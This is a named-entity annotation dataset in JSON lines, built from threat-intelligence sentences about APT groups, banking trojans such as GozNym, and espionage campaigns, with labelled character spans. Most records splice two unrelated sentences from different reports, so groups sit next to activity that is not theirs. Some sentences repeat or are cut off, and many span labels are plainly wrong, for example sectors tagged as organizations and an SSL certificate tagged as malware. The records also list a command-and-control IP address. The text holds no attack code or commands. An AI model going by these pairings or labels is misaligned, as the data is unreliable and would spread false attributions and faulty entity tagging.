After that , the attacker is capable to control the compromised device .", "spans": [{"start": 107, "end": 113, "label": "Organization"}, {"start": 127, "end": 136, "label": "Organization"}, {"start": 141, "end": 149, "label": "Organization"}, {"start": 247, "end": 267, "label": "Organization"}, {"start": 272, "end": 284, "label": "Organization"}, {"start": 303, "end": 311, "label": "Organization"}, {"start": 328, "end": 349, "label": "Organization"}, {"start": 362, "end": 372, "label": "Organization"}]} {"text": "This particular unit is believed to hack into victim companies throughout the world in order to steal corporate trade secrets , primarily relating to the satellite , aerospace and communication industries . The computers of diplomats , military attach\u00e9s , private assistants , secretaries to Prime Ministers , journalists and others are under the concealed control of unknown assailant .", "spans": [{"start": 166, "end": 175, "label": "Organization"}, {"start": 180, "end": 204, "label": "Organization"}, {"start": 224, "end": 233, "label": "Organization"}, {"start": 236, "end": 253, "label": "Organization"}, {"start": 256, "end": 274, "label": "Organization"}, {"start": 277, "end": 288, "label": "Organization"}, {"start": 292, "end": 307, "label": "Organization"}, {"start": 310, "end": 321, "label": "Organization"}]} {"text": "PUTTER PANDA is a determined adversary group , conducting intelligence-gathering operations targeting the Government , Defense , Research , and Technology sectors in the United States , with specific targeting of the US Defense and European satellite and aerospace industries . 
The C&C server ( 82.137.255.56 ) used by the above backdoors was used by APT-C-27 ( Goldmouse ) many times since 2017 .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 39, "end": 44, "label": "Organization"}, {"start": 106, "end": 116, "label": "Organization"}, {"start": 119, "end": 126, "label": "Organization"}, {"start": 129, "end": 137, "label": "Organization"}, {"start": 144, "end": 162, "label": "Organization"}, {"start": 217, "end": 227, "label": "Organization"}, {"start": 241, "end": 250, "label": "Organization"}, {"start": 255, "end": 275, "label": "Organization"}, {"start": 282, "end": 285, "label": "System"}, {"start": 295, "end": 308, "label": "Indicator"}, {"start": 351, "end": 359, "label": "Organization"}, {"start": 362, "end": 371, "label": "Organization"}]} {"text": "In 2015 and 2016 , Dridex was one of the most prolific eCrime banking trojans on the market and , since 2014 , those efforts are thought to have netted INDRIK SPIDER millions of dollars in criminal profits . According to 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor .", "spans": [{"start": 19, "end": 25, "label": "System"}, {"start": 62, "end": 69, "label": "Organization"}, {"start": 152, "end": 165, "label": "Organization"}, {"start": 221, "end": 251, "label": "Organization"}, {"start": 300, "end": 314, "label": "Malware"}]} {"text": "In August 2017 , a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K. 's National Health Service ( NHS ) , with a high ransom demand of 53 BTC ( approximately $200,000 USD ) . 
The banking malware GozNym has legs ; only a few weeks after the hybrid Trojan was discovered , it has reportedly spread into Europe and begun plaguing banking customers in Poland with redirection attacks .", "spans": [{"start": 56, "end": 65, "label": "System"}, {"start": 108, "end": 131, "label": "Organization"}, {"start": 134, "end": 137, "label": "Organization"}, {"start": 231, "end": 237, "label": "Malware"}, {"start": 283, "end": 289, "label": "Malware"}, {"start": 363, "end": 380, "label": "Organization"}]} {"text": "Known for hijacking prominent social media accounts , the self-styled white hat hacking group OurMine took over a number of verified Twitter and Facebook accounts belonging to the cable network . The APT group is reportedly targeting the Middle East region .", "spans": [{"start": 30, "end": 42, "label": "Organization"}, {"start": 133, "end": 140, "label": "Organization"}, {"start": 145, "end": 153, "label": "Organization"}]} {"text": "Through research , 360 Helios Team has found that , since 2007 , the Poison Ivy Group has carried out 11 years of cyber espionage campaigns against Chinese key units and departments , such as national defense , government , science and technology , education and maritime agencies . The malware has started targeting corporate , SMB , investment banking and consumer accounts at banks , including some in Portugal and the U.S. 
, in addition to Poland , according to researchers at IBM 's X-Force team .", "spans": [{"start": 19, "end": 34, "label": "Organization"}, {"start": 69, "end": 85, "label": "Organization"}, {"start": 192, "end": 208, "label": "Organization"}, {"start": 211, "end": 221, "label": "Organization"}, {"start": 224, "end": 231, "label": "Organization"}, {"start": 236, "end": 246, "label": "Organization"}, {"start": 249, "end": 258, "label": "Organization"}, {"start": 263, "end": 280, "label": "Organization"}, {"start": 329, "end": 332, "label": "Malware"}, {"start": 335, "end": 353, "label": "Organization"}, {"start": 379, "end": 384, "label": "Organization"}, {"start": 481, "end": 495, "label": "Organization"}]} {"text": "Dragos has reported that XENOTIME , the APT group behind the TRISIS (aka TRITON and HatMan) attack on a Saudi Arabian petro-chemical facility in 2017 , has expanded its focus beyond the oil and gas industries . According to Kessem the malware has redirection instructions for 17 banks , and features an additional 230 URLs to assist attackers in targeting community banks and email service providers in Poland .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 25, "end": 33, "label": "Organization"}, {"start": 61, "end": 67, "label": "Organization"}, {"start": 186, "end": 189, "label": "Organization"}, {"start": 194, "end": 208, "label": "Organization"}, {"start": 224, "end": 230, "label": "Organization"}, {"start": 279, "end": 284, "label": "Organization"}, {"start": 356, "end": 371, "label": "Organization"}, {"start": 376, "end": 399, "label": "Organization"}]} {"text": "Known targets of this group have been involved in the maritime industry , as well as engineering-focused entities , and include research institutes , academic organizations , and private firms in the United States . 
With GozNym , attackers dupe users by showing them the actual bank 's URL and SSL certificate .", "spans": [{"start": 22, "end": 27, "label": "Organization"}, {"start": 54, "end": 62, "label": "Organization"}, {"start": 128, "end": 147, "label": "Organization"}, {"start": 150, "end": 172, "label": "Organization"}, {"start": 179, "end": 192, "label": "Organization"}, {"start": 221, "end": 227, "label": "Malware"}, {"start": 278, "end": 282, "label": "Organization"}, {"start": 286, "end": 289, "label": "Malware"}, {"start": 294, "end": 309, "label": "Malware"}]} {"text": "Historically , the majority of their targeting has been focused on the South Korean government , military , and defense industrial base . Fresh from targeting banks in Poland , the banking Trojan GozNym has begun taking aim at banks in Germany .", "spans": [{"start": 71, "end": 94, "label": "Organization"}, {"start": 97, "end": 105, "label": "Organization"}, {"start": 112, "end": 119, "label": "Organization"}, {"start": 159, "end": 164, "label": "Organization"}, {"start": 181, "end": 188, "label": "Organization"}, {"start": 189, "end": 195, "label": "Malware"}, {"start": 196, "end": 202, "label": "Malware"}, {"start": 227, "end": 232, "label": "Organization"}]} {"text": "Historically , the majority of their targeting has been focused on the South Korean government , military , and defense industrial base . 
Attackers went on to use the Trojan to steal $4 million from 24 banks , including 22 in the United States and two in Canada , in just two weeks .", "spans": [{"start": 71, "end": 94, "label": "Organization"}, {"start": 97, "end": 105, "label": "Organization"}, {"start": 112, "end": 119, "label": "Organization"}, {"start": 167, "end": 173, "label": "Malware"}, {"start": 202, "end": 207, "label": "Organization"}]} {"text": "TEMP.Periscope BackgroundActive since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . Recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the GozNym group appears up to the task .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 54, "end": 68, "label": "Organization"}, {"start": 94, "end": 110, "label": "Organization"}, {"start": 157, "end": 174, "label": "Organization"}, {"start": 177, "end": 185, "label": "Organization"}, {"start": 190, "end": 204, "label": "Organization"}, {"start": 207, "end": 220, "label": "Organization"}, {"start": 223, "end": 230, "label": "Organization"}, {"start": 233, "end": 243, "label": "Organization"}, {"start": 258, "end": 279, "label": "Organization"}, {"start": 314, "end": 318, "label": "Organization"}, {"start": 354, "end": 360, "label": "Organization"}]} {"text": "TEMP.Periscope BackgroundActive since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . 
The malware is distributed primarily through laced spam emails that lure recipients into opening attachments .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 54, "end": 68, "label": "Organization"}, {"start": 94, "end": 110, "label": "Organization"}, {"start": 157, "end": 174, "label": "Organization"}, {"start": 177, "end": 185, "label": "Organization"}, {"start": 190, "end": 204, "label": "Organization"}, {"start": 207, "end": 220, "label": "Organization"}, {"start": 223, "end": 230, "label": "Organization"}, {"start": 233, "end": 243, "label": "Organization"}, {"start": 258, "end": 279, "label": "Organization"}, {"start": 338, "end": 344, "label": "System"}]} {"text": "These malware families have a rich history of being used in many targeted attacks against government and private organizations . Kessem .", "spans": [{"start": 6, "end": 13, "label": "Malware"}, {"start": 90, "end": 100, "label": "Organization"}, {"start": 105, "end": 112, "label": "Organization"}, {"start": 113, "end": 126, "label": "Organization"}, {"start": 129, "end": 135, "label": "Organization"}]} {"text": "In this same time frame , APT10 also targeted a U.S. law firm and an international apparel company , likely to gather information for commercial advantage . Fresh from targeting banks in Poland , the banking Trojan has reportedly begun taking aim at banks in Germany .", "spans": [{"start": 26, "end": 31, "label": "Organization"}, {"start": 48, "end": 61, "label": "Organization"}, {"start": 83, "end": 98, "label": "Organization"}, {"start": 178, "end": 183, "label": "Organization"}, {"start": 200, "end": 207, "label": "Organization"}, {"start": 208, "end": 214, "label": "Malware"}, {"start": 250, "end": 255, "label": "Organization"}]} {"text": "The admin@338 has largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors . 
Now GozNym is now targeting 13 banks and subsidiaries in Germany , Limor Kessem , Executive Security Advisor at IBM , said Tuesday .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 61, "end": 70, "label": "Organization"}, {"start": 73, "end": 81, "label": "Organization"}, {"start": 86, "end": 98, "label": "Organization"}, {"start": 117, "end": 140, "label": "System"}, {"start": 149, "end": 159, "label": "System"}, {"start": 175, "end": 195, "label": "System"}, {"start": 202, "end": 208, "label": "Malware"}, {"start": 229, "end": 234, "label": "Organization"}, {"start": 239, "end": 251, "label": "Organization"}, {"start": 271, "end": 277, "label": "Organization"}, {"start": 280, "end": 298, "label": "Organization"}, {"start": 310, "end": 313, "label": "Organization"}]} {"text": "The admin@338 started targeting Hong Kong media companies , probably in response to political and economic challenges in Hong Kong and China . he Trojan , a hybrid of Nymaim and Gozi malware , initially formed in April and thrives on carrying out redirection attacks via DNS poisoning .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 42, "end": 57, "label": "Organization"}, {"start": 84, "end": 93, "label": "Organization"}, {"start": 98, "end": 106, "label": "Organization"}, {"start": 146, "end": 152, "label": "Malware"}, {"start": 167, "end": 173, "label": "Malware"}, {"start": 178, "end": 182, "label": "Malware"}, {"start": 183, "end": 190, "label": "Malware"}]} {"text": "The admin@338 linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong . 
In April , shortly after the Trojan 's discovery , researchers observed a massive GozNym campaign targeting 24 North American banks .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 97, "end": 108, "label": "Organization"}, {"start": 230, "end": 236, "label": "Malware"}, {"start": 327, "end": 332, "label": "Organization"}]} {"text": "An APT gang linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong . The method , which technically redirects users through local DNS poisoning , requires a fair bit of work ; recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the group behind GozNym \u2013 Nymaim \u2013 appear up to the task .", "spans": [{"start": 3, "end": 6, "label": "Organization"}, {"start": 7, "end": 11, "label": "Organization"}, {"start": 95, "end": 106, "label": "Organization"}, {"start": 338, "end": 342, "label": "Organization"}, {"start": 378, "end": 384, "label": "Organization"}, {"start": 409, "end": 415, "label": "Malware"}]} {"text": "The group targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy . 
Attackers behind Dyre have used similar tactics in the past but have only deployed their attacks in English speaking countries and Spain .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 30, "end": 35, "label": "Organization"}, {"start": 54, "end": 63, "label": "Organization"}, {"start": 121, "end": 142, "label": "System"}, {"start": 151, "end": 161, "label": "System"}, {"start": 172, "end": 182, "label": "Organization"}, {"start": 187, "end": 202, "label": "Organization"}, {"start": 219, "end": 234, "label": "Organization"}]} {"text": "The agroup targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy . When we last heard from the Trojan , its operators were seen launching redirection attacks on four large , U.S. banks in June .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 31, "end": 36, "label": "Organization"}, {"start": 55, "end": 64, "label": "Organization"}, {"start": 122, "end": 143, "label": "System"}, {"start": 152, "end": 162, "label": "System"}, {"start": 173, "end": 183, "label": "Organization"}, {"start": 188, "end": 203, "label": "Organization"}, {"start": 220, "end": 235, "label": "Organization"}, {"start": 273, "end": 279, "label": "Malware"}, {"start": 357, "end": 362, "label": "Organization"}]} {"text": "The admin@338 , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . 
The fact that the cybercriminals behind GozNym have already adapted the Trojan for three different languages and in countries which have different banking systems is unique , according to Kessem .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 81, "end": 99, "label": "Organization"}, {"start": 102, "end": 110, "label": "Organization"}, {"start": 113, "end": 123, "label": "Organization"}, {"start": 130, "end": 145, "label": "Organization"}, {"start": 188, "end": 194, "label": "Malware"}, {"start": 220, "end": 226, "label": "Malware"}, {"start": 336, "end": 342, "label": "Organization"}]} {"text": "The APT actor , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . By the end of April , GozNym had redirection instructions for 17 Polish banks in its repertoire , along with an extra 230 URLs designed to assist attackers in targeting community banks and email service providers in the Eastern European country .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 81, "end": 99, "label": "Organization"}, {"start": 102, "end": 110, "label": "Organization"}, {"start": 113, "end": 123, "label": "Organization"}, {"start": 130, "end": 145, "label": "Organization"}, {"start": 170, "end": 176, "label": "Malware"}, {"start": 220, "end": 225, "label": "Organization"}, {"start": 317, "end": 332, "label": "Organization"}, {"start": 337, "end": 360, "label": "Organization"}]} {"text": "FireEye said it has tracked admin@338 's activity since 2013 and the group has largely targeted organizations involved in financial , economic , and trade policy . 
Seeking to tease out any possible links between Operation Aurora , VOHO , Operation DeputyDog , and Ephemeral Hydra , we began with Symantec 's Hidden Lynx report as our foundation .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 28, "end": 37, "label": "Organization"}, {"start": 69, "end": 74, "label": "Organization"}, {"start": 122, "end": 131, "label": "Organization"}, {"start": 134, "end": 142, "label": "Organization"}, {"start": 149, "end": 161, "label": "Organization"}, {"start": 296, "end": 304, "label": "Organization"}]} {"text": "They have largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors . The authors of that report identify three primary tools used in the campaigns attributed to Hidden Lynx : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit .", "spans": [{"start": 53, "end": 62, "label": "Organization"}, {"start": 65, "end": 73, "label": "Organization"}, {"start": 78, "end": 90, "label": "Organization"}, {"start": 109, "end": 132, "label": "System"}, {"start": 141, "end": 151, "label": "System"}, {"start": 167, "end": 187, "label": "System"}, {"start": 296, "end": 307, "label": "Malware"}, {"start": 310, "end": 326, "label": "Indicator"}, {"start": 333, "end": 347, "label": "Malware"}]} {"text": "Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT16 launched several spear phishing attacks targeting Japan and Taiwan in the high-tech , government services , media and financial services industries . 
We will detail how the C&C infrastructure and tools used by hacker group Hidden Lynx during its VOHO campaign ( 2012 ) , excellently documented by Symantec researchers last September , overlap with tools used in other high profile operations during the past few years .", "spans": [{"start": 85, "end": 90, "label": "Organization"}, {"start": 165, "end": 174, "label": "Organization"}, {"start": 177, "end": 196, "label": "Organization"}, {"start": 199, "end": 204, "label": "Organization"}, {"start": 209, "end": 238, "label": "Organization"}, {"start": 264, "end": 267, "label": "System"}, {"start": 314, "end": 325, "label": "Organization"}, {"start": 388, "end": 396, "label": "Organization"}]} {"text": "Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries . When the New York Times and Mandiant last year unmasked a large scale Chinese hacking operation , pinpointing its location down to the building , the report drew mainstream attention to what security professionals already well knew : sophisticated threat actors carry out persistent cyber operations over months and years .", "spans": [{"start": 85, "end": 95, "label": "Organization"}, {"start": 190, "end": 199, "label": "Organization"}, {"start": 202, "end": 221, "label": "Organization"}, {"start": 224, "end": 229, "label": "Organization"}, {"start": 234, "end": 263, "label": "Organization"}, {"start": 275, "end": 289, "label": "Organization"}, {"start": 294, "end": 302, "label": "Organization"}]} {"text": "TG-0416 is a stealthy and extremely successful Advanced Persistent Threat ( APT ) group known to target a broad range of verticals since at least 2009 , including technology , industrial , manufacturing , human rights groups , government , pharmaceutical , and medical technology . 
By the end of April , GozNym had redirection instructions for 17 Polish banks in its repertoire , along with an extra 230 URLs designed to assist attackers in targeting community banks and email service providers in the Eastern European country .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 47, "end": 73, "label": "Organization"}, {"start": 76, "end": 79, "label": "Organization"}, {"start": 163, "end": 173, "label": "Organization"}, {"start": 176, "end": 186, "label": "Organization"}, {"start": 189, "end": 202, "label": "Organization"}, {"start": 205, "end": 224, "label": "Organization"}, {"start": 227, "end": 237, "label": "Organization"}, {"start": 240, "end": 254, "label": "Organization"}, {"start": 261, "end": 279, "label": "Organization"}, {"start": 304, "end": 310, "label": "Malware"}, {"start": 354, "end": 359, "label": "Organization"}, {"start": 451, "end": 466, "label": "Organization"}, {"start": 471, "end": 494, "label": "Organization"}]} {"text": "APT19 seemed to be going after defense sector firms , Chinese dissident groups and political , financial , pharmaceutical and energy sectors that could benefit the Chinese economy . Using Recorded Future , we quickly built a timeline of the reported use of those tools in major security incidents , finding many events prior to the early 2013 expos\u00e9 on Hidden Lynx .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 31, "end": 51, "label": "Organization"}, {"start": 54, "end": 78, "label": "Organization"}, {"start": 83, "end": 140, "label": "Organization"}, {"start": 353, "end": 364, "label": "Organization"}]} {"text": "APT19 seemed to be going after defense sector firms , Chinese dissident groups and other political target , as well as certain financial targets and other commercial targets in pharmaceutical and energy sectors that could benefit the Chinese economy . 
In particular , FireEye during the fall of 2013 called out infrastructure overlap between Ephemeral Hydra and DeputyDog .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 31, "end": 51, "label": "Organization"}, {"start": 89, "end": 105, "label": "Organization"}, {"start": 127, "end": 136, "label": "Organization"}, {"start": 155, "end": 165, "label": "Organization"}, {"start": 177, "end": 191, "label": "Organization"}, {"start": 196, "end": 210, "label": "Organization"}, {"start": 268, "end": 275, "label": "Organization"}, {"start": 362, "end": 371, "label": "Malware"}]} {"text": "FANCY BEAR ( also known as Sofacy or APT 28 ) is a separate Russian-based threat actor , which has been active since mid 2000s , and has been responsible for targeted intrusion campaigns against the Aerospace , Defense , Energy , Government and Media sectors . The above network shows relationships between three tools used by Hidden Lynx during its VOHO campaign : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 27, "end": 33, "label": "Organization"}, {"start": 37, "end": 43, "label": "Organization"}, {"start": 74, "end": 86, "label": "Organization"}, {"start": 199, "end": 208, "label": "Organization"}, {"start": 211, "end": 218, "label": "Organization"}, {"start": 221, "end": 227, "label": "Organization"}, {"start": 230, "end": 240, "label": "Organization"}, {"start": 245, "end": 258, "label": "Organization"}, {"start": 366, "end": 377, "label": "Malware"}, {"start": 380, "end": 396, "label": "Indicator"}, {"start": 403, "end": 417, "label": "Malware"}]} {"text": "APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government . 
Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor.Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx .", "spans": [{"start": 137, "end": 148, "label": "Organization"}, {"start": 151, "end": 161, "label": "Organization"}, {"start": 164, "end": 180, "label": "Organization"}, {"start": 183, "end": 197, "label": "Organization"}, {"start": 204, "end": 214, "label": "Organization"}, {"start": 219, "end": 226, "label": "Organization"}, {"start": 271, "end": 279, "label": "Organization"}, {"start": 343, "end": 354, "label": "Malware"}, {"start": 359, "end": 375, "label": "Indicator"}, {"start": 394, "end": 400, "label": "Malware"}, {"start": 410, "end": 424, "label": "Organization"}, {"start": 434, "end": 445, "label": "Organization"}]} {"text": "APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government . In addition to these , we also identified \" Macfog \" , a native Mac OS X implementation of Icefog that infected several hundred victims worldwide .", "spans": [{"start": 137, "end": 148, "label": "Organization"}, {"start": 153, "end": 163, "label": "Organization"}, {"start": 166, "end": 182, "label": "Organization"}, {"start": 185, "end": 199, "label": "Organization"}, {"start": 206, "end": 216, "label": "Organization"}, {"start": 221, "end": 228, "label": "Organization"}, {"start": 317, "end": 323, "label": "Malware"}, {"start": 330, "end": 360, "label": "Malware"}, {"start": 364, "end": 370, "label": "Malware"}]} {"text": "Since at least 2014 , FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam 's manufacturing , consumer products , and hospitality sectors . 
Icefog , also known as the \" Dagger Panda \" by Crowdstrike 's naming convention , infected targets mainly in South Korea and Japan .", "spans": [{"start": 22, "end": 29, "label": "Organization"}, {"start": 43, "end": 48, "label": "Organization"}, {"start": 59, "end": 79, "label": "Organization"}, {"start": 117, "end": 130, "label": "Organization"}, {"start": 133, "end": 150, "label": "Organization"}, {"start": 157, "end": 176, "label": "Organization"}, {"start": 179, "end": 185, "label": "Organization"}, {"start": 208, "end": 220, "label": "Organization"}, {"start": 226, "end": 237, "label": "Organization"}]} {"text": "APT33 has targeted organizations \u2013 spanning multiple industries \u2013 headquartered in the United States , Saudi Arabia and South Korea . In 2013 , a public report reveals a group of actors conducted targeted attacks leverage a malware dubbed ICEFOG against mainly government organizations and defense industry of South Korea and Japan .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 35, "end": 63, "label": "Organization"}, {"start": 239, "end": 245, "label": "Malware"}, {"start": 261, "end": 285, "label": "Organization"}, {"start": 290, "end": 306, "label": "Organization"}]} {"text": "During the same time period , APT33 also targeted companies in South Korea involved in oil refining and petrochemicals . 
Similar to our approach with Symantec 's report on Hidden Lynx , we used Recorded Future to organize the technical details about the DeputyDog attacks to reveal technical information described in the open source reporting across multiple campaigns .", "spans": [{"start": 30, "end": 35, "label": "Organization"}, {"start": 87, "end": 99, "label": "Organization"}, {"start": 104, "end": 118, "label": "Organization"}, {"start": 150, "end": 158, "label": "Organization"}]} {"text": "The generalized targeting of organizations involved in energy and petrochemicals mirrors previously observed targeting by other suspected Iranian threat groups , indicating a common interest in the sectors across Iranian actors . With Javafog , we are turning yet another page in the Icefog story by discovering another generation of backdoors used by the attackers .", "spans": [{"start": 55, "end": 61, "label": "Organization"}, {"start": 66, "end": 80, "label": "Organization"}, {"start": 146, "end": 159, "label": "Organization"}, {"start": 221, "end": 227, "label": "Organization"}, {"start": 284, "end": 290, "label": "Malware"}]} {"text": "APT33 's targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests , implying that the threat actor is most likely government sponsored . Since January 2013 , we've been on the lookout for a possible RedOctober comeback .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 48, "end": 57, "label": "Organization"}, {"start": 62, "end": 68, "label": "Organization"}, {"start": 137, "end": 149, "label": "Organization"}, {"start": 250, "end": 260, "label": "Organization"}]} {"text": "APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . 
One possible hit was triggered when we observed Mevade , an unusual piece of malware that appeared late in 2013 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 18, "end": 26, "label": "Organization"}, {"start": 90, "end": 98, "label": "Organization"}, {"start": 175, "end": 183, "label": "Organization"}]} {"text": "Specifically , the targeting of organizations in the aerospace and energy sectors indicates that the APT33 is likely in search of strategic intelligence capable of benefitting a government or military sponsor . In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware .", "spans": [{"start": 53, "end": 62, "label": "Organization"}, {"start": 67, "end": 81, "label": "Organization"}, {"start": 101, "end": 106, "label": "Organization"}, {"start": 178, "end": 188, "label": "Organization"}, {"start": 192, "end": 200, "label": "Organization"}, {"start": 292, "end": 305, "label": "Vulnerability"}]} {"text": "APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military aviation capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . It wasn't until August 2014 that we observed something which made us wonder if RedOctober is back for good .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 18, "end": 26, "label": "Organization"}, {"start": 140, "end": 148, "label": "Organization"}, {"start": 184, "end": 192, "label": "Organization"}]} {"text": "In 2017 , APT37 expanded its targeting beyond the Korean peninsula to include Japan , Vietnam and the Middle East , and to a wider range of industry verticals , including chemicals , electronics , manufacturing , aerospace , automotive and healthcare entities . 
The Cloud Atlas implants utilize a rather unusual C&C mechanism .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 171, "end": 180, "label": "Organization"}, {"start": 183, "end": 194, "label": "Organization"}, {"start": 197, "end": 210, "label": "Organization"}, {"start": 213, "end": 222, "label": "Organization"}, {"start": 225, "end": 235, "label": "Organization"}, {"start": 240, "end": 259, "label": "Organization"}]} {"text": "We surmise that the targeting of banks , media , and government agencies is conducted in support of APT38 's primary mission . We named it RedOctober because we started this investigation in October 2012 , an unusually hot month .", "spans": [{"start": 33, "end": 38, "label": "Organization"}, {"start": 41, "end": 46, "label": "Organization"}, {"start": 53, "end": 72, "label": "Organization"}, {"start": 100, "end": 105, "label": "Organization"}]} {"text": "The APT38 targeted news outlets known for their business and financial sector reporting , probably in support of efforts to identify and compromise additional financial institutions . The attackers upload data to the account , which is downloaded by the implant , decrypted and interpreted .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 19, "end": 31, "label": "Organization"}, {"start": 61, "end": 77, "label": "Organization"}, {"start": 159, "end": 181, "label": "Organization"}]} {"text": "APT39 has prioritized the telecommunications sector , with additional targeting of the travel industry and IT firms that support it and the high-tech industry . 
Just like with RedOctober , the top target of Cloud Atlas is Russia , followed closely by Kazakhstan , according to data from the Kaspersky Security Network ( KSN ) .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 26, "end": 51, "label": "Organization"}, {"start": 87, "end": 102, "label": "Organization"}, {"start": 107, "end": 115, "label": "Organization"}, {"start": 140, "end": 158, "label": "Organization"}, {"start": 176, "end": 186, "label": "Organization"}, {"start": 291, "end": 317, "label": "Organization"}, {"start": 320, "end": 323, "label": "Organization"}]} {"text": "APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns . In May 2015 , Palo Alto Networks WildFire detected two e-mails carrying malicious documents from a genuine and compromised Israeli Gmail account , sent to an Israeli industrial organization .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 22, "end": 62, "label": "Organization"}, {"start": 149, "end": 169, "label": "Organization"}, {"start": 404, "end": 431, "label": "Organization"}, {"start": 445, "end": 452, "label": "System"}, {"start": 556, "end": 579, "label": "Organization"}]} {"text": "REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japanese organizations such as government agencies ( including defense ) as well as those in biotechnology , electronics manufacturing , and industrial chemistry . 
One e-mail carried a Microsoft PowerPoint file named \" thanks.pps \" ( VirusTotal ) , the other a Microsoft Word document named \" request.docx \" .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 30, "end": 43, "label": "Organization"}, {"start": 48, "end": 52, "label": "Organization"}, {"start": 60, "end": 80, "label": "Organization"}, {"start": 128, "end": 147, "label": "Organization"}, {"start": 160, "end": 167, "label": "Organization"}, {"start": 190, "end": 203, "label": "Organization"}, {"start": 206, "end": 231, "label": "Organization"}, {"start": 238, "end": 258, "label": "Organization"}, {"start": 265, "end": 271, "label": "System"}, {"start": 282, "end": 302, "label": "System"}, {"start": 316, "end": 326, "label": "Indicator"}, {"start": 331, "end": 341, "label": "System"}, {"start": 358, "end": 372, "label": "System"}, {"start": 390, "end": 402, "label": "Indicator"}]} {"text": "REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japan such as government agencies as well as those in biotechnology , electronics manufacturing , and industrial chemistry . Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello.docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. 
